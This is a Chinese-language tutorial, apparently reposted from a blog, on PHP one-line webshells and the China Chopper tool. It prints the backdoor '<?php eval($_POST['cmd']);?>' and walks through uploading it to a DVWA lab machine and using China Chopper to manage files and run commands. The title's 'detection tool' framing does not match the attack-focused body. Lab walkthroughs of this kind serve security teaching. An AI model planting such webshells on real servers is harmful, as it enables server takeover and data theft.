网站被挂马检测工具(Webshell网站后门检测工具)

一句话木马是Webshell的一种,那什么是Webshell?先讲讲什么是shell。Shell是系统的用户界面,提供了用户与内核进行交互操作的一种接口。它接收用户输入的命令并把它送入内核去执行。因为系统内核是我们不能直接操作的,shell就给我们提供了一个接口,通过shell我们可以把命令送入到内核。shell管理用户与操作系统之间的交互,等待你输入,向操作系统解释你的输入,并且处理各种各样的操

一句话木马是Webshell的一种,那什么是Webshell?先讲讲什么是shell。Shell是系统的用户界面,提供了用户与内核进行交互操作的一种接口。它接收用户输入的命令并把它送入内核去执行。因为系统内核是我们不能直接操作的,shell就给我们提供了一个接口,通过shell我们可以把命令送入到内核。shell管理用户与操作系统之间的交互,等待你输入,向操作系统解释你的输入,并且处理各种各样的操作系统的输出结果。

网站被挂马检测工具(Webshell网站后门检测工具)

PHP一句话木马

网络安全行业有一句非常有名的谚语:“一个不想获得目标站点Webshell的黑客不是一个好的黑客”,可见Webshell对一个黑客的吸引是多么的强烈, 黑客在入侵了一个网站后,通常会留下一个asp或php后门文件与网站web服务器进行交互,得到一个命令执行环境,以达到控制网站服务器的目的。这个后门文件就是所谓的webshell。

一句话木马

一句话木马作为Webshell的一种,由于这类Webshell代码比较少,往往只有一行代码,所以就被称为一句话木马。一句话木马虽然代码简单,但是结合中国菜刀等Webshell管理工具,它们的功能却是非常的强大。

一句话木马举例

下面就是一个简单的PHP语言一句话木马:

<?php eval($_POST['cmd']);?>

eval函数

把字符串按照 PHP 代码来计算,该字符串必须是合法的 PHP 代码,且必须以分号结尾。

$_POST

PHP 超全局变量 ,$_POST 用于收集表单数据(form-data)。一句话木马会把我们通过POST方式提交的符合php代码规范的字符串当做php代码执行。

中国菜刀

这里的中国菜刀不是指切菜做饭的工具,而是中国安全圈内使用非常广泛的一款Webshell管理工具,中国菜刀用途十分广泛,支持多种语言,小巧实用,中国菜刀有三个主要功能。

文件管理

可以访问站点所在服务器里边存储的文件,甚至可以删除、上传、下载里边的文件。

网站被挂马检测工具(Webshell网站后门检测工具)

文件管理

虚拟终端

可以在以下命令框中执行命令,获取服务器相关信息。

网站被挂马检测工具(Webshell网站后门检测工具)

虚拟终端

数据库管理

如果服务器上安装有数据库可以通过SQL语句查询数据库里边的数据。

网站被挂马检测工具(Webshell网站后门检测工具)

数据库管理

下面我就演示一下如何利用一句话木马和中国菜刀来获取目标站点Webshell,首先是测试环境我们使用DVWA,我们这次选择使用虚拟机中的OWASPBWA的DVWA,打开虚拟机中的OWASPBWA运行到如下图所示:

网站被挂马检测工具(Webshell网站后门检测工具)

OWASPBWA

注意图中红框中的信息,一是:http://192.168.199.131,二是:username=root,password=owaspbwa,根据提示输入用户名root,密码owaspbwa,进入OWASPBWA虚拟机中,打开主机浏览器输入网址http://192.168.199.131,进入OWASPBWA主界面,点击图中下方红框中的链接,如下图所示:

网站被挂马检测工具(Webshell网站后门检测工具)

OWASPBWA主界面

进入到DVWA登录界面,输入username=admin,password=admin,进入DVWA,如下图所示:

网站被挂马检测工具(Webshell网站后门检测工具)

DVWA登录界面

登录DVWA后,点击左侧“upload”-浏览选择文件-点击“upload”按钮-提示“../../hackable/uploads/123.php succesfully uploaded!”表示上传成功,如下图所示,注意下图左下角“Security Level: low”,否则上传不会成功。

网站被挂马检测工具(Webshell网站后门检测工具)

上传123.php一句话木马

然后打开中国菜刀,在空白处右键选择“添加”,出现添加SHELL窗口,在地址栏填入http://192.168.199.131/dvwa/hackable/uploads/123.php,后边小输入栏填入“cmd”,就是一句话木马中<?php eval($_POST['cmd']);?>中的POST参数,脚本类型选择PHP(Eval),字符编码为GB2312,点击添加。

网站被挂马检测工具(Webshell网站后门检测工具)

添加shell

双击添加好的shell就可以访问目标主机OWASPBWA中的文件,你可以删除、编辑及下载里边的文件,甚至可以上传“大马”到目标主机,获得更多的权限,如下图所示:

网站被挂马检测工具(Webshell网站后门检测工具)

访问目标主机文件

从以上的利用过程我们可以看出,使用中国菜刀通过一句话木马获取目标主机管理权限,需要三个必要条件,一是必须把一句话木马上传到目标主机,二是必须知道上传路径,三是上传路径有可执行权限,三者缺一不可,我们可以根据这三个必要条件制定如何防范类似攻击的方案。

以上就是今天介绍的一句话木马及中国菜刀,以及如何利用一句话木马和中国菜刀获取目标主机的管理权限,但是现在的网站服务器在上传过程中大部分都过滤了一句话木马,使得一句话木马无法轻易上传到目标服务器,接下来我会分享一些一句话木马的变形,感兴趣的可以加个关注@科技兴了解更多科技,尤其是网络安全方面的知识和咨询。

版权声明:本文图片和内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送联系客服 举报,一经查实,本站将立刻删除,转转请注明出处:https://www.soutaowang.com/17114.html

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注